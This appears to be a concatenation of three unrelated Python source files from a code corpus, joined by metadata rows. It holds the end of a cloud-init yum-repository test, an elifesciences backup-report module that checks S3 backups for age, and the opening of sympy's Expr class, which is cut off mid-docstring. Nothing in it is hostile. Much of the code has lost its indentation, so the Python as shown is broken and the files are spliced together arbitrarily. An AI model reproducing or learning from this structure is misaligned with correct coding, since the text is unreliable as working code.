# 'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
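        # 'baseurl' is missing above, so the repo file must not have been written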
self.assertRaises(IOError, util.load_file,
"/etc/yum.repos.d/epel_testing.repo")
def test_write_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
contents = util.load_file("/etc/yum.repos.d/epel_testing.repo")
contents = configobj.ConfigObj(StringIO(contents))
expected = {
'epel_testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'failovermethod': 'priority',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'enabled': '0',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'gpgcheck': '1',
}
}
self.assertEquals(expected, dict(contents))
| gpl-3.0 | -351,846,011,476,720,400 | 34.402985 | 80 | 0.510118 | false |
elifesciences/ubr | ubr/report.py | 1 | 5341 | import re
from datetime import datetime
import logging
from ubr.utils import group_by_many, visit
from ubr import conf, s3
from ubr.descriptions import load_descriptor, find_descriptors, pname
LOG = logging.getLogger(__name__)
def bucket_contents(bucket):
"returns a list of all keys in the given bucket"
paginator = s3.s3_conn().get_paginator("list_objects")
iterator = paginator.paginate(**{"Bucket": bucket, "Prefix": ""})
results = []
for page in iterator:
results.extend([i["Key"] for i in page["Contents"]])
return results
def parse_prefix_list(prefix_list):
"splits a bucket prefix-path into a map of data"
splitter = r"(?P<project>.+)\/(?P<ym>\d+)\/(?P<ymd>\d+)_(?P<host>[a-z0-9\.\-]+)_(?P<hms>\d+)\-(?P<filename>.+)$"
splitter = re.compile(splitter)
results = []
for row in prefix_list:
try:
results.append(splitter.match(row).groupdict())
except AttributeError:
# failed to parse row. these are in all cases very old or adhoc files and can be safely ignored
continue
return results
def filter_backup_list(backup_list):
"filters the given list of backups, excluding 'hidden' backups, non-production backups and projects/files that are on a blacklist configured in conf.py"
project_blacklist = conf.REPORT_PROJECT_BLACKLIST
file_blacklist = conf.REPORT_FILE_BLACKLIST
# we want to target only working machines and ignore test/retired/etc projects
def cond(backup):
return (
not backup["project"].startswith("_")
and any([substr in backup["host"] for substr in ["prod", "master-server"]])
and backup["project"] not in project_blacklist
and backup["filename"] not in file_blacklist
)
return filter(cond, backup_list)
def all_projects_latest_backups_by_host_and_filename(bucket):
"returns a nested map of the most recent backup for each project+host+filename"
# this function by itself is really insightful.
# perhaps have it accept a list of backups rather than creating one itself?
prefix_list = bucket_contents(bucket)
backup_list = parse_prefix_list(prefix_list)
backup_list = filter_backup_list(backup_list)
# we want a list of the backups for each of the targets
# {project: {host: {filename: [item-list]}}}
backup_list = group_by_many(backup_list, ["project", "host", "filename"])
# we want to transform the deeply nested struct above to retain only the most recent
# backup. the leaves are sorted lists in ascending order, least to most recent
def apply_to_backup(x):
return isinstance(x, list)
def most_recent_backup(lst):
return lst[-1]
# {project: {host: {filename: latest-item}}}
return visit(backup_list, apply_to_backup, most_recent_backup)
def dtobj_from_backup(backup):
"given a backup struct, returns a datetime object"
dtstr = backup["ymd"] + backup["hms"]
return datetime.strptime(dtstr, "%Y%m%d%H%M%S")
def old_backup(backup):
"predicate, returns true if given backup is 'old' (older than 2 days)"
dtobj = dtobj_from_backup(backup)
diff = datetime.now() - dtobj
threshold = conf.REPORT_PROBLEM_THRESHOLD
return diff.days > threshold
#
def print_report(backup_list):
"given a list of backups, prints it's details"
result = group_by_many(backup_list, ["project", "host", "filename"])
for project, hosts in result.items():
print(project)
for host, files in hosts.items():
print(" ", host)
for filename, backup in files.items():
backup = backup[0] # why is this a list ... ?
ppdt = dtobj_from_backup(backup)
print(" %s: %s" % (filename, ppdt))
def check_all():
"check all project that backups are happening"
results = all_projects_latest_backups_by_host_and_filename(conf.BUCKET)
problems = []
for project, hosts in results.items():
for host, files in hosts.items():
for filename, backup in files.items():
old_backup(backup) and problems.append(backup)
# problems.append(backup)
if problems:
print_report(problems)
return problems
def check(hostname, path_list=None):
"check self that backups are happening"
problems = []
for descriptor_path in find_descriptors(conf.DESCRIPTOR_DIR):
# 'lax'
project = pname(descriptor_path)
# {'postgresql-database': ['lax']}
descriptor = load_descriptor(descriptor_path, path_list)
for target, remote_path_list in descriptor.items():
# [('laxprod-psql.gz', 'lax/201908/20190825_prod--lax.elifesciences.org_230337-laxprod-psql.gz')
# ('laxprod-archive.tar.gz', ' 'lax/201908/20190825_prod--lax.elifesciences.org_230337-laxprod-psql.gz')]
latest_for_target = s3.latest_backups(
conf.BUCKET, project, hostname, target
)
path_list = [s3_path for fname, s3_path in latest_for_target]
backup_list = parse_prefix_list(path_list)
for backup in backup_list:
old_backup(backup) and problems.append(backup)
# problems.append(backup)
problems and print_report(problems)
return problems
| gpl-3.0 | 7,652,267,443,760,472,000 | 37.15 | 156 | 0.646508 | false |
Curious72/sympy | sympy/core/expr.py | 1 | 113033 | from __future__ import print_function, division
from .sympify import sympify, _sympify, SympifyError
from .basic import Basic, Atom
from .singleton import S
from .evalf import EvalfMixin, pure_complex
from .decorators import _sympifyit, call_highest_priority
from .cache import cacheit
from .compatibility import reduce, as_int, default_sort_key, range
from mpmath.libmp import mpf_log, prec_to_dps
from collections import defaultdict
class Expr(Basic, EvalfMixin):
"""
Base class for algebraic expressions.
Everything that requires arithmetic operations to be defined
should subclass this class, instead of Basic (which should be
used only for argument storage and expression manipulation, i.e.
pattern matching, substitutions, etc).
See Also
========
sympy.core.basic.Basic
"""
__slots__ = []
@property
def _diff_wrt(self):
"""Is it allowed to take derivative wrt to this instance.
This determines if it is allowed to take derivatives wrt this object.
Subclasses such as Symbol, Function and Derivative should return True
to enable derivatives wrt them. The implementation in Derivative
separates the Symbol and non-Symbol _diff_wrt=True variables and
        temporarily converts the non-Symbol vars to Symbols when performing
the differentiation.
Note, see the docstring of Derivative for how this should work
mathematically. In particular, note that expr.subs(yourclass, Symbol)
should be well-defined on a structural level, or this will lead to
inconsistent results.
Examples
========
>>> from sympy import Expr
>>> e = Expr()
>>> e._diff_wrt
False
>>> class MyClass(Expr):
... _diff_wrt = True
...
>>> (2*MyClass()).diff(MyClass())
2
"""
return False
@cacheit
def sort_key(self, order=None):
coeff, expr = self.as_coeff_Mul()
if expr.is_Pow:
expr, exp = expr.args
else:
expr, exp = expr, S.One
if expr.is_Dummy:
args = (expr.sort_key(),)
elif expr.is_Atom:
args = (str(expr),)
else:
if expr.is_Add:
args = expr.as_ordered_terms(order=order)
elif expr.is_Mul:
args = expr.as_ordered_factors(order=order)
else:
args = expr.args
args = tuple(
[ default_sort_key(arg, order=order) for arg in args ])
args = (len(args), tuple(args))
exp = exp.sort_key(order=order)
return expr.class_key(), args, exp, coeff
# ***************
# * Arithmetics *
# ***************
    # Expr and its subclasses use _op_priority to determine which object
# passed to a binary special method (__mul__, etc.) will handle the
# operation. In general, the 'call_highest_priority' decorator will choose
# the object with the highest _op_priority to handle the call.
# Custom subclasses that want to define their own binary special methods
# should set an _op_priority value that is higher than the default.
#
# **NOTE**:
# This is a temporary fix, and will eventually be replaced with
# something better and more powerful. See issue 5510.
_op_priority = 10.0
def __pos__(self):
return self
def __neg__(self):
return Mul(S.NegativeOne, self)
def __abs__(self):
from sympy import Abs
return Abs(self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__radd__')
def __add__(self, other):
return Add(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__add__')
def __radd__(self, other):
return Add(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rsub__')
def __sub__(self, other):
return Add(self, -other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__sub__')
def __rsub__(self, other):
return Add(other, -self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmul__')
def __mul__(self, other):
return Mul(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mul__')
def __rmul__(self, other):
return Mul(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rpow__')
def __pow__(self, other):
return Pow(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__pow__')
def __rpow__(self, other):
return Pow(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rdiv__')
def __div__(self, other):
return Mul(self, Pow(other, S.NegativeOne))
@_sympifyit('other', NotImplemented)
@call_highest_priority('__div__')
def __rdiv__(self, other):
return Mul(other, Pow(self, S.NegativeOne))
__truediv__ = __div__
__rtruediv__ = __rdiv__
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmod__')
def __mod__(self, other):
return Mod(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mod__')
def __rmod__(self, other):
return Mod(other, self)
def __int__(self):
# Although we only need to round to the units position, we'll
# get one more digit so the extra testing below can be avoided
# unless the rounded value rounded to an integer, e.g. if an
# expression were equal to 1.9 and we rounded to the unit position
# we would get a 2 and would not know if this rounded up or not
# without doing a test (as done below). But if we keep an extra
# digit we know that 1.9 is not the same as 1 and there is no
# need for further testing: our int value is correct. If the value
# were 1.99, however, this would round to 2.0 and our int value is
# off by one. So...if our round value is the same as the int value
# (regardless of how much extra work we do to calculate extra decimal
# places) we need to test whether we are off by one.
from sympy import Dummy
r = self.round(2)
if not r.is_Number:
raise TypeError("can't convert complex to int")
if r in (S.NaN, S.Infinity, S.NegativeInfinity):
raise TypeError("can't convert %s to int" % r)
i = int(r)
if not i:
return 0
# off-by-one check
if i == r and not (self - i).equals(0):
isign = 1 if i > 0 else -1
x = Dummy()
# in the following (self - i).evalf(2) will not always work while
# (self - r).evalf(2) and the use of subs does; if the test that
# was added when this comment was added passes, it might be safe
# to simply use sign to compute this rather than doing this by hand:
diff_sign = 1 if (self - x).evalf(2, subs={x: i}) > 0 else -1
if diff_sign != isign:
i -= isign
return i
__long__ = __int__
def __float__(self):
# Don't bother testing if it's a number; if it's not this is going
# to fail, and if it is we still need to check that it evalf'ed to
# a number.
result = self.evalf()
if result.is_Number:
return float(result)
if result.is_number and result.as_real_imag()[1]:
raise TypeError("can't convert complex to float")
raise TypeError("can't convert expression to float")
def __complex__(self):
result = self.evalf()
re, im = result.as_real_imag()
return complex(float(re), float(im))
def __ge__(self, other):
from sympy import GreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s >= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonnegative is not None and \
dif.is_nonnegative is not dif.is_negative:
return sympify(dif.is_nonnegative)
return GreaterThan(self, other, evaluate=False)
def __le__(self, other):
from sympy import LessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s <= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonpositive is not None and \
dif.is_nonpositive is not dif.is_positive:
return sympify(dif.is_nonpositive)
return LessThan(self, other, evaluate=False)
def __gt__(self, other):
from sympy import StrictGreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s > %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_positive is not None and \
dif.is_positive is not dif.is_nonpositive:
return sympify(dif.is_positive)
return StrictGreaterThan(self, other, evaluate=False)
def __lt__(self, other):
from sympy import StrictLessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s < %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_negative is not None and \
dif.is_negative is not dif.is_nonnegative:
return sympify(dif.is_negative)
return StrictLessThan(self, other, evaluate=False)
@staticmethod
def _from_mpmath(x, prec):
from sympy import Float
if hasattr(x, "_mpf_"):
return Float._new(x._mpf_, prec)
elif hasattr(x, "_mpc_"):
re, im = x._mpc_
re = Float._new(re, prec)
im = Float._new(im, prec)*S.ImaginaryUnit
return re + im
else:
raise TypeError("expected mpmath number (mpf or mpc)")
@property
def is_number(self):
"""Returns True if 'self' has no free symbols.
It will be faster than `if not self.free_symbols`, however, since
`is_number` will fail as soon as it hits a free symbol.
Examples
========
>>> from sympy import log, Integral
>>> from sympy.abc import x
>>> x.is_number
False
>>> (2*x).is_number
False
>>> (2 + log(2)).is_number
True
>>> (2 + Integral(2, x)).is_number
False
>>> (2 + Integral(2, (x, 1, 2))).is_number
True
"""
return all(obj.is_number for obj in self.args)
def _random(self, n=None, re_min=-1, im_min=-1, re_max=1, im_max=1):
"""Return self evaluated, if possible, replacing free symbols with
random complex values, if necessary.
The random complex value for each free symbol is generated
by the random_complex_number routine giving real and imaginary
parts in the range given by the re_min, re_max, im_min, and im_max
values. The returned value is evaluated to a precision of n
(if given) else the maximum of 15 and the precision needed
to get more than 1 digit of precision. If the expression
could not be evaluated to a number, or could not be evaluated
to more than 1 digit of precision, then None is returned.
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y
>>> x._random() # doctest: +SKIP
0.0392918155679172 + 0.916050214307199*I
>>> x._random(2) # doctest: +SKIP
-0.77 - 0.87*I
>>> (x + y/2)._random(2) # doctest: +SKIP
-0.57 + 0.16*I
>>> sqrt(2)._random(2)
1.4
See Also
========
sympy.utilities.randtest.random_complex_number
"""
free = self.free_symbols
prec = 1
if free:
from sympy.utilities.randtest import random_complex_number
a, c, b, d = re_min, re_max, im_min, im_max
reps = dict(list(zip(free, [random_complex_number(a, b, c, d, rational=True)
for zi in free])))
try:
nmag = abs(self.evalf(2, subs=reps))
except (ValueError, TypeError):
# if an out of range value resulted in evalf problems
# then return None -- XXX is there a way to know how to
# select a good random number for a given expression?
# e.g. when calculating n! negative values for n should not
# be used
return None
else:
reps = {}
nmag = abs(self.evalf(2))
if not hasattr(nmag, '_prec'):
# e.g. exp_polar(2*I*pi) doesn't evaluate but is_number is True
return None
if nmag._prec == 1:
# increase the precision up to the default maximum
# precision to see if we can get any significance
from mpmath.libmp.libintmath import giant_steps
from sympy.core.evalf import DEFAULT_MAXPREC as target
# evaluate
for prec in giant_steps(2, target):
nmag = abs(self.evalf(prec, subs=reps))
if nmag._prec != 1:
break
if nmag._prec != 1:
if n is None:
n = max(prec, 15)
return self.evalf(n, subs=reps)
# never got any significance
return None
def is_constant(self, *wrt, **flags):
"""Return True if self is constant, False if not, or None if
the constancy could not be determined conclusively.
If an expression has no free symbols then it is a constant. If
there are free symbols it is possible that the expression is a
constant, perhaps (but not necessarily) zero. To test such
expressions, two strategies are tried:
1) numerical evaluation at two random points. If two such evaluations
give two different values and the values have a precision greater than
1 then self is not constant. If the evaluations agree or could not be
obtained with any precision, no decision is made. The numerical testing
is done only if ``wrt`` is different than the free symbols.
2) differentiation with respect to variables in 'wrt' (or all free
symbols if omitted) to see if the expression is constant or not. This
will not always lead to an expression that is zero even though an
expression is constant (see added test in test_expr.py). If
all derivatives are zero then self is constant with respect to the
given symbols.
If neither evaluation nor differentiation can prove the expression is
constant, None is returned unless two numerical values happened to be
the same and the flag ``failing_number`` is True -- in that case the
numerical value will be returned.
If flag simplify=False is passed, self will not be simplified;
the default is True since self should be simplified before testing.
Examples
========
>>> from sympy import cos, sin, Sum, S, pi
>>> from sympy.abc import a, n, x, y
>>> x.is_constant()
False
>>> S(2).is_constant()
True
>>> Sum(x, (x, 1, 10)).is_constant()
True
>>> Sum(x, (x, 1, n)).is_constant()
False
>>> Sum(x, (x, 1, n)).is_constant(y)
True
>>> Sum(x, (x, 1, n)).is_constant(n)
False
>>> Sum(x, (x, 1, n)).is_constant(x)
True
>>> eq = a*cos(x)**2 + a*sin(x)**2 - a
>>> eq.is_constant()
True
>>> eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
True
>>> (0**x).is_constant()
False
>>> x.is_constant()
False
>>> (x**x).is_constant()
False
>>> one = cos(x)**2 + sin(x)**2
>>> one.is_constant()
True
>>> ((one - 1)**(x + 1)).is_constant() in (True, False) # could be 0 or 1
True
"""
simplify = flags.get('simplify', True)
# Except for expressions that contain units, only one of these should
# be necessary since if something is
# known to be a number it should also know that there are no
# free symbols. But is_number quits as soon as it hits a non-number
# whereas free_symbols goes until all free symbols have been collected,
# thus is_number should be faster. But a double check on free symbols
# is made just in case there is a discrepancy between the two.
free = self.free_symbols
if self.is_number or not free:
# if the following assertion fails then that object's free_symbols
# method needs attention: if an expression is a number it cannot
# have free symbols
assert not free
return True
# if we are only interested in some symbols and they are not in the
# free symbols then this expression is constant wrt those symbols
wrt = set(wrt)
if wrt and not wrt & free:
return True
wrt = wrt or free
# simplify unless this has already been done
expr = self
if simplify:
expr = expr.simplify()
# is_zero should be a quick assumptions check; it can be wrong for
# numbers (see test_is_not_constant test), giving False when it
# shouldn't, but hopefully it will never give True unless it is sure.
if expr.is_zero:
return True
# try numerical evaluation to see if we get two different values
failing_number = None
if wrt == free:
# try 0 (for a) and 1 (for b)
try:
a = expr.subs(list(zip(free, [0]*len(free))),
simultaneous=True)
if a is S.NaN:
# evaluation may succeed when substitution fails
a = expr._random(None, 0, 0, 0, 0)
except ZeroDivisionError:
a = None
if a is not None and a is not S.NaN:
try:
b = expr.subs(list(zip(free, [1]*len(free))),
simultaneous=True)
if b is S.NaN:
# evaluation may succeed when substitution fails
b = expr._random(None, 1, 0, 1, 0)
except ZeroDivisionError:
b = None
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random real
b = expr._random(None, -1, 0, 1, 0)
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random complex
b = expr._random()
if b is not None and b is not S.NaN:
if b.equals(a) is False:
return False
failing_number = a if a.is_number else b
# now we will test each wrt symbol (or all free symbols) to see if the
# expression depends on them or not using differentiation. This is
# not sufficient for all expressions, however, so we don't return
# False if we get a derivative other than 0 with free symbols.
for w in wrt:
deriv = expr.diff(w)
if simplify:
deriv = deriv.simplify()
if deriv != 0:
if not (pure_complex(deriv, or_real=True)):
if flags.get('failing_number', False):
return failing_number
elif deriv.free_symbols:
# dead line provided _random returns None in such cases
return None
return False
return True
def equals(self, other, failing_expression=False):
"""Return True if self == other, False if it doesn't, or None. If
failing_expression is True then the expression which did not simplify
to a 0 will be returned instead of None.
If ``self`` is a Number (or complex number) that is not zero, then
the result is False.
If ``self`` is a number and has not evaluated to zero, evalf will be
used to test whether the expression evaluates to zero. If it does so
and the result has significance (i.e. the precision is either -1, for
a Rational result, or is greater than 1) then the evalf value will be
used to return True or False.
"""
from sympy.simplify.simplify import nsimplify, simplify
from sympy.solvers.solvers import solve
from sympy.solvers.solveset import solveset
from sympy.polys.polyerrors import NotAlgebraic
from sympy.polys.numberfields import minimal_polynomial
other = sympify(other)
if self == other:
return True
# they aren't the same so see if we can make the difference 0;
# don't worry about doing simplification steps one at a time
# because if the expression ever goes to 0 then the subsequent
# simplification steps that are done will be very fast.
diff = factor_terms((self - other).simplify(), radical=True)
if not diff:
return True
if not diff.has(Add, Mod):
# if there is no expanding to be done after simplifying
# then this can't be a zero
return False
constant = diff.is_constant(simplify=False, failing_number=True)
if constant is False:
return False
if constant is None and (diff.free_symbols or not diff.is_number):
# e.g. unless the right simplification is done, a symbolic
# zero is possible (see expression of issue 6829: without
# simplification constant will be None).
return
if constant is True:
ndiff = diff._random()
if ndiff:
return False
# sometimes we can use a simplified result to give a clue as to
# what the expression should be; if the expression is *not* zero
# then we should have been able to compute that and so now
# we can just consider the cases where the approximation appears
# to be zero -- we try to prove it via minimal_polynomial.
if diff.is_number:
approx = diff.nsimplify()
if not approx:
# try to prove via self-consistency
surds = [s for s in diff.atoms(Pow) if s.args[0].is_Integer]
# it seems to work better to try big ones first
surds.sort(key=lambda x: -x.args[0])
for s in surds:
try:
# simplify is False here -- this expression has already
# been identified as being hard to identify as zero;
# we will handle the checking ourselves using nsimplify
# to see if we are in the right ballpark or not and if so
# *then* the simplification will be attempted.
if s.is_Symbol:
sol = list(solveset(diff, s))
else:
sol = [s]
if sol:
if s in sol:
return True
if s.is_real:
if any(nsimplify(si, [s]) == s and simplify(si) == s
for si in sol):
return True
except NotImplementedError:
pass
# try to prove with minimal_polynomial but know when
# *not* to use this or else it can take a long time. e.g. issue 8354
if True: # change True to condition that assures non-hang
try:
mp = minimal_polynomial(diff)
if mp.is_Symbol:
return True
return False
except (NotAlgebraic, NotImplementedError):
pass
# diff has not simplified to zero; constant is either None, True
# or the number with significance (prec != 1) that was randomly
# calculated twice as the same value.
if constant not in (True, None) and constant != 0:
return False
if failing_expression:
return diff
return None
def _eval_is_positive(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n > 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_is_negative(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n < 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_interval(self, x, a, b):
"""
Returns evaluation over an interval. For most functions this is:
self.subs(x, b) - self.subs(x, a),
possibly using limit() if NaN is returned from subs.
        If b or a is None, it only evaluates -self.subs(x, a) or self.subs(x, b),
respectively.
"""
from sympy.series import limit, Limit
if (a is None and b is None):
raise ValueError('Both interval ends cannot be None.')
if a is None:
A = 0
else:
A = self.subs(x, a)
if A.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
A = limit(self, x, a)
if A is S.NaN:
return A
if isinstance(A, Limit):
raise NotImplementedError("Could not compute limit")
if b is None:
B = 0
else:
B = self.subs(x, b)
if B.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
B = limit(self, x, b)
if isinstance(B, Limit):
raise NotImplementedError("Could not compute limit")
return B - A
def _eval_power(self, other):
# subclass to compute self**other for cases when
# other is not NaN, 0, or 1
return None
def _eval_conjugate(self):
if self.is_real:
return self
elif self.is_imaginary:
return -self
def conjugate(self):
from sympy.functions.elementary.complexes import conjugate as c
return c(self)
def _eval_transpose(self):
from sympy.functions.elementary.complexes import conjugate
if self.is_complex:
return self
elif self.is_hermitian:
return conjugate(self)
elif self.is_antihermitian:
return -conjugate(self)
def transpose(self):
from sympy.functions.elementary.complexes import transpose
return transpose(self)
def _eval_adjoint(self):
from sympy.functions.elementary.complexes import conjugate, transpose
if self.is_hermitian:
return self
elif self.is_antihermitian:
return -self
obj = self._eval_conjugate()
if obj is not None:
return transpose(obj)
obj = self._eval_transpose()
if obj is not None:
return conjugate(obj)
def adjoint(self):
from sympy.functions.elementary.complexes import adjoint
return adjoint(self)
@classmethod
def _parse_order(cls, order):
"""Parse and configure the ordering of terms. """
from sympy.polys.orderings import monomial_key
try:
reverse = order.startswith('rev-')
except AttributeError:
reverse = False
else:
if reverse:
order = order[4:]
monom_key = monomial_key(order)
def neg(monom):
result = []
for m in monom:
if isinstance(m, tuple):
result.append(neg(m))
else:
result.append(-m)
return tuple(result)
def key(term):
_, ((re, im), monom, ncpart) = term
monom = neg(monom_key(monom))
ncpart = tuple([e.sort_key(order=order) for e in ncpart])
coeff = ((bool(im), im), (re, im))
return monom, ncpart, coeff
return key, reverse
def as_ordered_factors(self, order=None):
"""Return list of ordered factors (if Mul) else [self]."""
return [self]
def as_ordered_terms(self, order=None, data=False):
"""
Transform an expression to an ordered list of terms.
Examples
========
>>> from sympy import sin, cos
>>> from sympy.abc import x
>>> (sin(x)**2*cos(x) + sin(x)**2 + 1).as_ordered_terms()
[sin(x)**2*cos(x), sin(x)**2, 1]
"""
key, reverse = self._parse_order(order)
terms, gens = self.as_terms()
if not any(term.is_Order for term, _ in terms):
ordered = sorted(terms, key=key, reverse=reverse)
else:
_terms, _order = [], []
for term, repr in terms:
if not term.is_Order:
_terms.append((term, repr))
else:
_order.append((term, repr))
ordered = sorted(_terms, key=key, reverse=True) \
+ sorted(_order, key=key, reverse=True)
if data:
return ordered, gens
else:
return [term for term, _ in ordered]
def as_terms(self):
"""Transform an expression to a list of terms. """
from .add import Add
from .mul import Mul
from .exprtools import decompose_power
gens, terms = set([]), []
for term in Add.make_args(self):
coeff, _term = term.as_coeff_Mul()
coeff = complex(coeff)
cpart, ncpart = {}, []
if _term is not S.One:
for factor in Mul.make_args(_term):
if factor.is_number:
try:
coeff *= complex(factor)
except TypeError:
pass
else:
continue
if factor.is_commutative:
base, exp = decompose_power(factor)
cpart[base] = exp
gens.add(base)
else:
ncpart.append(factor)
coeff = coeff.real, coeff.imag
ncpart = tuple(ncpart)
terms.append((term, (coeff, cpart, ncpart)))
gens = sorted(gens, key=default_sort_key)
k, indices = len(gens), {}
for i, g in enumerate(gens):
indices[g] = i
result = []
for term, (coeff, cpart, ncpart) in terms:
monom = [0]*k
for base, exp in cpart.items():
monom[indices[base]] = exp
result.append((term, (coeff, tuple(monom), ncpart)))
return result, gens
def removeO(self):
"""Removes the additive O(..) symbol if there is one"""
return self
def getO(self):
"""Returns the additive O(..) symbol if there is one, else None."""
return None
def getn(self):
"""
Returns the order of the expression.
The order is determined either from the O(...) term. If there
is no O(...) term, it returns None.
Examples
========
>>> from sympy import O
>>> from sympy.abc import x
>>> (1 + x + O(x**2)).getn()
2
>>> (1 + x).getn()
"""
from sympy import Dummy, Symbol
o = self.getO()
if o is None:
return None
elif o.is_Order:
o = o.expr
if o is S.One:
return S.Zero
if o.is_Symbol:
return S.One
if o.is_Pow:
return o.args[1]
if o.is_Mul: # x**n*log(x)**n or x**n/log(x)**n
for oi in o.args:
if oi.is_Symbol:
return S.One
if oi.is_Pow:
syms = oi.atoms(Symbol)
if len(syms) == 1:
x = syms.pop()
oi = oi.subs(x, Dummy('x', positive=True))
if oi.base.is_Symbol and oi.exp.is_Rational:
return abs(oi.exp)
raise NotImplementedError('not sure of order of %s' % o)
def count_ops(self, visual=None):
"""wrapper for count_ops that returns the operation count."""
from .function import count_ops
return count_ops(self, visual)
def args_cnc(self, cset=False, warn=True, split_1=True):
"""Return [commutative factors, non-commutative factors] of self.
self is treated as a Mul and the ordering of the factors is maintained.
If ``cset`` is True the commutative factors will be returned in a set.
If there were repeated factors (as may happen with an unevaluated Mul)
        then an error will be raised unless it is explicitly suppressed by
setting ``warn`` to False.
Note: -1 is always separated from a Number unless split_1 is False.
>>> from sympy import symbols, oo
>>> A, B = symbols('A B', commutative=0)
>>> x, y = symbols('x y')
>>> (-2*x*y).args_cnc()
[[-1, 2, x, y], []]
>>> (-2.5*x).args_cnc()
[[-1, 2.5, x], []]
>>> (-2*x*A*B*y).args_cnc()
[[-1, 2, x, y], [A, B]]
>>> (-2*x*A*B*y).args_cnc(split_1=False)
[[-2, x, y], [A, B]]
>>> (-2*x*y).args_cnc(cset=True)
[set([-1, 2, x, y]), []]
The arg is always treated as a Mul:
>>> (-2 + x + A).args_cnc()
[[], [x - 2 + A]]
>>> (-oo).args_cnc() # -oo is a singleton
[[-1, oo], []]
"""
if self.is_Mul:
args = list(self.args)
else:
args = [self]
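        # everything before the first non-commutative factor is commutative; the rest keeps its order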
for i, mi in enumerate(args):
if not mi.is_commutative:
c = args[:i]
nc = args[i:]
break
else:
c = args
nc = []
if c and split_1 and (
c[0].is_Number and
c[0].is_negative and
c[0] is not S.NegativeOne):
c[:1] = [S.NegativeOne, -c[0]]
if cset:
clen = len(c)
c = set(c)
if clen and warn and len(c) != clen:
raise ValueError('repeated commutative arguments: %s' %
[ci for ci in c if list(self.args).count(ci) > 1])
return [c, nc]
def coeff(self, x, n=1, right=False):
"""
        Returns the coefficient from the term(s) containing ``x**n`` (0 if there is no such term). If ``n``
is zero then all terms independent of ``x`` will be returned.
When x is noncommutative, the coeff to the left (default) or right of x
can be returned. The keyword 'right' is ignored when x is commutative.
See Also
========
